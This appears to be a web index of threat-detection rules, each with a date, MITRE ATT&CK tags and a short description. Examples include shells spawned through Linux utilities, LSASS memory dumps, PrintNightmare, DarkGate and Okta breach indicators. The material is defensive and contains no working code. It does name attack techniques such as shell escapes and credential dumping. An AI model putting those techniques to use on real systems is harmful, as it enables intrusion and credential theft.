    calendar Oct 1, 2024 · attack.discovery attack.t1518.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.


    Read More
  • Suspicious Chromium Browser Instance Executed With Custom Extension

    calendar Oct 1, 2024 · attack.persistence attack.t1176  ·
    Share on: twitter facebook linkedin copy

    Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension


    Read More
  • Suspicious Path In Keyboard Layout IME File Registry Value

    calendar Oct 1, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.


    Read More
  • Suspicious Shim Database Patching Activity

    calendar Oct 1, 2024 · attack.persistence attack.t1546.011  ·
    Share on: twitter facebook linkedin copy

    Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.


    Read More
  • Uncommon Extension In Keyboard Layout IME File Registry Value

    calendar Oct 1, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.


    Read More
  • Unusual Parent Process For Cmd.EXE

    calendar Oct 1, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious parent process for cmd.exe


    Read More
  • Vulnerable Driver Load

    calendar Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068  ·
    Share on: twitter facebook linkedin copy

    Detects loading of known vulnerable drivers via their hash.


    Read More
  • Vulnerable Driver Load By Name

    calendar Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068  ·
    Share on: twitter facebook linkedin copy

    Detects the load of known vulnerable drivers via the file name of the drivers.


    Read More
  • Whoami.EXE Execution From Privileged Process

    calendar Oct 1, 2024 · attack.privilege-escalation attack.discovery attack.t1033  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors


    Read More
  • Whoami.EXE Execution With Output Option

    calendar Oct 1, 2024 · attack.discovery attack.t1033 car.2016-03-001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.


    Read More
  • Linux HackTool Execution

    calendar Sep 22, 2024 · attack.execution attack.resource-development attack.t1587  ·
    Share on: twitter facebook linkedin copy

    Detects known hacktool execution based on image name.


    Read More
  • Linux Network Service Scanning Tools Execution

    calendar Sep 22, 2024 · attack.discovery attack.t1046  ·
    Share on: twitter facebook linkedin copy

    Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.


    Read More
  • Remote Access Tool - MeshAgent Command Execution via MeshCentral

    calendar Sep 22, 2024 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.


    Read More
  • Windows Defender Exclusion Registry Key - Write Access Requested

    calendar Sep 22, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.


    Read More
  • Windows Defender Real-time Protection Disabled

    calendar Sep 22, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a "medium" level if this occurs too many times in your environment


    Read More
  • Detect MeshAgent Command Execution via MeshCentral

    calendar Sep 21, 2024 · attack.command_and_control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.


    Read More
  • Search for Antivirus process

    calendar Sep 20, 2024  ·
    Share on: twitter facebook linkedin copy

    Search for Antivirus process


    Read More
  • Network Connection Initiated To BTunnels Domains

    calendar Sep 13, 2024 · attack.exfiltration attack.t1567.001  ·
    Share on: twitter facebook linkedin copy

    Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • PwnKit Local Privilege Escalation

    calendar Sep 13, 2024 · attack.privilege-escalation attack.t1548.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential PwnKit exploitation CVE-2021-4034 in auth logs


    Read More
  • UNC2452 Process Creation Patterns

    calendar Sep 13, 2024 · attack.execution attack.t1059.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries


    Read More
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern

    calendar Sep 13, 2024 · attack.execution attack.privilege-escalation attack.resource-development attack.t1587 cve.2021-1675 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675


    Read More
  • HackTool - DInjector PowerShell Cradle Execution

    calendar Sep 13, 2024 · attack.defense-evasion attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the Dinject PowerShell cradle based on the specific flags


    Read More
  • InstallerFileTakeOver LPE CVE-2021-41379 File Create Event

    calendar Sep 13, 2024 · attack.privilege-escalation attack.t1068 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file


    Read More
  • LPE InstallerFileTakeOver PoC CVE-2021-41379

    calendar Sep 13, 2024 · attack.initial-access attack.t1190 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379


    Read More
  • Possible CVE-2021-1675 Print Spooler Exploitation

    calendar Sep 13, 2024 · attack.execution attack.t1569 cve.2021-1675 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675


    Read More
  • Potential PrintNightmare Exploitation Attempt

    calendar Sep 13, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574 cve.2021-1675  ·
    Share on: twitter facebook linkedin copy

    Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675


    Read More
  • Potential RDP Exploit CVE-2019-0708

    calendar Sep 13, 2024 · attack.lateral-movement attack.t1210 car.2013-07-002  ·
    Share on: twitter facebook linkedin copy

    Detect suspicious error on protocol RDP, potential CVE-2019-0708


    Read More
  • Potential SAM Database Dump

    calendar Sep 13, 2024 · attack.credential-access attack.t1003.002  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of files that look like exports of the local SAM (Security Account Manager)


    Read More
  • Scanner PoC for CVE-2019-0708 RDP RCE Vuln

    calendar Sep 13, 2024 · attack.lateral-movement attack.t1210 car.2013-07-002  ·
    Share on: twitter facebook linkedin copy

    Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep


    Read More
  • Suspicious Rejected SMB Guest Logon From IP

    calendar Sep 13, 2024 · attack.credential-access attack.t1110.001  ·
    Share on: twitter facebook linkedin copy

    Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service


    Read More
  • Windows Spooler Service Suspicious Binary Load

    calendar Sep 13, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574 cve.2021-1675 cve.2021-34527  ·
    Share on: twitter facebook linkedin copy

    Detect DLL Load from Spooler Service backup folder


    Read More
  • Cicada Ransomware PSExec File Creation

    calendar Sep 9, 2024 · attack.lateral-movement attack.execution attack.t1570 attack.t1569 attack.t1569.002 attack.s0029  ·
    Share on: twitter facebook linkedin copy

    Detects creation of a lightly-renamed PSExec file in C:\Users\Public, as observed in the Cicada3301 Ransomware report from MorphiSec.


    Read More
  • Cicada3301 Ransomware Execution via PSExec

    calendar Sep 9, 2024 · attack.execution attack.t1569 attack.t1569.002 attack.s0029  ·
    Share on: twitter facebook linkedin copy

    Detects the use of a potentially-renamed psexec to run the Cicada3301 ransomware tool.


    Read More
  • Hyper-V Virtual Machine Discovery Shutdown via Powershell Cmdlets

    calendar Sep 9, 2024 · attack.defense-evasion attack.impact attack.t1578 attack.t1578.003 attack.t1529  ·
    Share on: twitter facebook linkedin copy

    Detects powershell process used to find and shut down local Hyper-V VMs using the Stop-VM cmdlet, as documented in the 2024 Morphisec report on Cicada3301 ransomware.


    Read More
  • IISReset Used to Stop IIS Services

    calendar Sep 9, 2024 · attack.impact attack.defense-evasion attack.t1562 attack.t1562.001 attack.t1529  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the iisreset.exe utility to stop IIS web services. This is used to prevent users from accessing IIS web resources, thereby releasing/preventing locks which could inhibit ransomware-related encryption.


    Read More
  • Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image

    calendar Sep 6, 2024 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.


    Read More
  • Potential Defense Evasion Via Right-to-Left Override

    calendar Sep 6, 2024 · attack.defense-evasion attack.t1036.002  ·
    Share on: twitter facebook linkedin copy

    Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques.


    Read More
  • Startup/Logon Script Added to Group Policy Object

    calendar Sep 6, 2024 · attack.privilege-escalation attack.t1484.001 attack.t1547  ·
    Share on: twitter facebook linkedin copy

    Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.


    Read More
  • Persistence and Execution at Scale via GPO Scheduled Task

    calendar Sep 6, 2024 · attack.persistence attack.lateral-movement attack.t1053.005  ·
    Share on: twitter facebook linkedin copy

    Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale


    Read More
  • Group Policy Abuse for Privilege Addition

    calendar Sep 6, 2024 · attack.privilege-escalation attack.t1484.001  ·
    Share on: twitter facebook linkedin copy

    Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.


    Read More
  • Process Deletion of Its Own Executable

    calendar Sep 3, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.


    Read More
  • Dism Remove Online Package

    calendar Sep 3, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images


    Read More
  • PowerShell Web Access Feature Enabled Via DISM

    calendar Sep 3, 2024 · attack.persistence attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse


    Read More
  • PowerShell Web Access Installation - PsScript

    calendar Sep 3, 2024 · attack.persistence attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse


    Read More
  • Capsh Shell Invocation - Linux

    calendar Sep 2, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the "capsh" utility to invoke a shell.


    Read More
  • Inline Python Execution - Spawn Shell Via OS System Library

    calendar Sep 2, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.


    Read More
  • Shell Execution GCC - Linux

    calendar Sep 2, 2024 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.


    Read More
  • Shell Execution via Find - Linux

    calendar Sep 2, 2024 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.


    Read More
  • Shell Execution via Flock - Linux

    calendar Sep 2, 2024 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.


    Read More
  • Shell Execution via Git - Linux

    calendar Sep 2, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.


    Read More
  • Shell Execution via Nice - Linux

    calendar Sep 2, 2024 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.


    Read More
  • Shell Invocation via Apt - Linux

    calendar Sep 2, 2024 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.


    Read More
  • Shell Invocation via Env Command - Linux

    calendar Sep 2, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.


    Read More
  • Shell Invocation Via Ssh - Linux

    calendar Sep 2, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.


    Read More
  • Suspicious Invocation of Shell via AWK - Linux

    calendar Sep 2, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.


    Read More
  • Vim GTFOBin Abuse - Linux

    calendar Sep 2, 2024 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.


    Read More
  • AWS S3 Bucket Versioning Disable

    calendar Sep 2, 2024 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.


    Read More
  • Certificate Use With No Strong Mapping

    calendar Sep 2, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID) This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.


    Read More
  • ChromeLoader Malware Execution

    calendar Sep 2, 2024 · attack.execution attack.persistence attack.t1053.005 attack.t1059.001 attack.t1176 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects execution of ChromeLoader malware via a registered scheduled task


    Read More
  • DarkGate - Autoit3.EXE Execution Parameters

    calendar Sep 2, 2024 · attack.execution attack.t1059 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server.


    Read More
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process

    calendar Sep 2, 2024 · attack.command-and-control attack.execution attack.t1105 attack.t1059 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.


    Read More
  • DarkGate - User Created Via Net.EXE

    calendar Sep 2, 2024 · attack.persistence attack.t1136.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects creation of local users via the net.exe command with the name of "DarkGate"


    Read More
  • Diamond Sleet APT DNS Communication Indicators

    calendar Sep 2, 2024 · attack.command-and-control detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries related to Diamond Sleet APT activity


    Read More
  • Diamond Sleet APT File Creation Indicators

    calendar Sep 2, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects file creation activity that is related to Diamond Sleet APT activity


    Read More
  • Diamond Sleet APT Process Activity Indicators

    calendar Sep 2, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects process creation activity indicators related to Diamond Sleet APT


    Read More
  • Diamond Sleet APT Scheduled Task Creation

    calendar Sep 2, 2024 · attack.execution attack.privilege-escalation attack.persistence attack.t1053.005 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability


    Read More
  • Diamond Sleet APT Scheduled Task Creation - Registry

    calendar Sep 2, 2024 · attack.defense-evasion attack.t1562 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability


    Read More
  • Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback

    calendar Sep 2, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.


    Read More
  • Exploitation Indicators Of CVE-2023-20198

    calendar Sep 2, 2024 · attack.privilege-escalation attack.initial-access detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI.


    Read More
  • File Download From IP Based URL Via CertOC.EXE

    calendar Sep 2, 2024 · attack.command-and-control attack.execution attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects when a user downloads a file from an IP based URL using CertOC.exe


    Read More
  • File Download From IP URL Via Curl.EXE

    calendar Sep 2, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects file downloads directly from IP address URL using curl.exe


    Read More
  • HackTool - CoercedPotato Named Pipe Creation

    calendar Sep 2, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of a pipe name as used by the hack tool CoercedPotato


    Read More
  • Injected Browser Process Spawning Rundll32 - GuLoader Activity

    calendar Sep 2, 2024 · attack.defense-evasion attack.t1055 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of installed GuLoader malware on the host. GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.


    Read More
  • Kerberoasting Activity - Initial Query

    calendar Sep 2, 2024 · attack.credential-access attack.t1558.003  ·
    Share on: twitter facebook linkedin copy

    This rule will collect the data needed to start looking into possible kerberoasting activity. Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds. You can then set a threshold for the number of requests and time between the requests to turn this into an alert.


    Read More
  • LSASS Process Memory Dump Creation Via Taskmgr.EXE

    calendar Sep 2, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.


    Read More
  • New Okta User Created

    calendar Sep 2, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects new user account creation


    Read More
  • Obfuscated IP Via CLI

    calendar Sep 2, 2024 · attack.discovery  ·
    Share on: twitter facebook linkedin copy

    Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line


    Read More
  • Okta 2023 Breach Indicator Of Compromise

    calendar Sep 2, 2024 · attack.credential-access detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach. This rule can be enhanced by filtering out known and legitimate username used in your environnement.


    Read More
  • Okta Admin Functions Access Through Proxy

    calendar Sep 2, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects access to Okta admin functions through proxy.


    Read More
  • OneNote.EXE Execution of Malicious Embedded Scripts

    calendar Sep 2, 2024 · attack.defense-evasion attack.t1218.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.


    Read More
  • Onyx Sleet APT File Creation Indicators

    calendar Sep 2, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects file creation activity that is related to Onyx Sleet APT activity


    Read More
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon

    calendar Sep 2, 2024 · attack.initial-access attack.t1190 cve.2021-44228 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.


    Read More
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution

    calendar Sep 2, 2024 · attack.execution attack.initial-access attack.t1059.006 attack.t1190 cve.2022-22954 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.


    Read More
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader

    calendar Sep 2, 2024 · attack.persistence attack.t1505.001 cve.2023-27363 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.


    Read More
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream

    calendar Sep 2, 2024 · attack.defense-evasion attack.t1564.004  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"


    Read More
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI

    calendar Sep 2, 2024 · attack.defense-evasion attack.t1564.004  ·
    Share on: twitter facebook linkedin copy

    Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"


    Read More
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy

    calendar Sep 2, 2024 · attack.initial-access attack.t1190 cve.2023-43621 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs.


    Read More
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web

    calendar Sep 2, 2024 · attack.initial-access attack.t1190 cve.2023-43621 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs.


    Read More
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE

    calendar Sep 2, 2024 · attack.execution attack.t1059 cve.2023-34362 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.

    MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\([a-z0-9]{5,12})\([a-z0-9]{5,12})\App_Web_[a-z0-9]{5,12}.dll.

    Hunting Opportunity

    Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.


    Read More
  • Potential Okta Password in AlternateID Field

    calendar Sep 2, 2024 · attack.credential-access attack.t1552  ·
    Share on: twitter facebook linkedin copy

    Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.


    Read More
  • Potentially Suspicious Child Process Of VsCode

    calendar Sep 2, 2024 · attack.execution attack.defense-evasion attack.t1218 attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.


    Read More
  • Potentially Suspicious Office Document Executed From Trusted Location

    calendar Sep 2, 2024 · attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.


    Read More
  • PowerShell Module File Created By Non-PowerShell Process

    calendar Sep 2, 2024 · attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process


    Read More
  • PowerShell Script Execution Policy Enabled

    calendar Sep 2, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.


    Read More
  • Python Function Execution Security Warning Disabled In Excel

    calendar Sep 2, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.


    Read More
  • Raspberry Robin Initial Execution From External Drive

    calendar Sep 2, 2024 · attack.execution attack.t1059.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".


    Read More
  • Raspberry Robin Subsequent Execution of Commands

    calendar Sep 2, 2024 · attack.execution attack.t1059.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects raspberry robin subsequent execution of commands.


    Read More
  • Remote Access Tool - ScreenConnect Command Execution

    calendar Sep 2, 2024 · attack.execution attack.t1059.003  ·
    Share on: twitter facebook linkedin copy

    Detects command execution via ScreenConnect RMM


    Read More
  • Remote Access Tool - ScreenConnect File Transfer

    calendar Sep 2, 2024 · attack.execution attack.t1059.003  ·
    Share on: twitter facebook linkedin copy

    Detects file being transferred via ScreenConnect RMM


    Read More
  • Remote Access Tool - ScreenConnect Temporary File

    calendar Sep 2, 2024 · attack.execution attack.t1059.003  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users<username>\Documents\ConnectWiseControl\Temp" before execution.


    Read More
  • Renamed CURL.EXE Execution

    calendar Sep 2, 2024 · attack.execution attack.t1059 attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields


    Read More
  • Renamed VsCode Code Tunnel Execution - File Indicator

    calendar Sep 2, 2024 · attack.command-and-control  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.


    Read More
  • Security Software Discovery Via Powershell Script

    calendar Sep 2, 2024 · attack.discovery attack.t1518.001  ·
    Share on: twitter facebook linkedin copy

    Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus


    Read More
  • Serpent Backdoor Payload Execution Via Scheduled Task

    calendar Sep 2, 2024 · attack.execution attack.persistence attack.t1053.005 attack.t1059.006 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.


    Read More
  • Suspicious LNK Double Extension File Created

    calendar Sep 2, 2024 · attack.defense-evasion attack.t1036.007  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.


    Read More
  • Suspicious Sysmon as Execution Parent

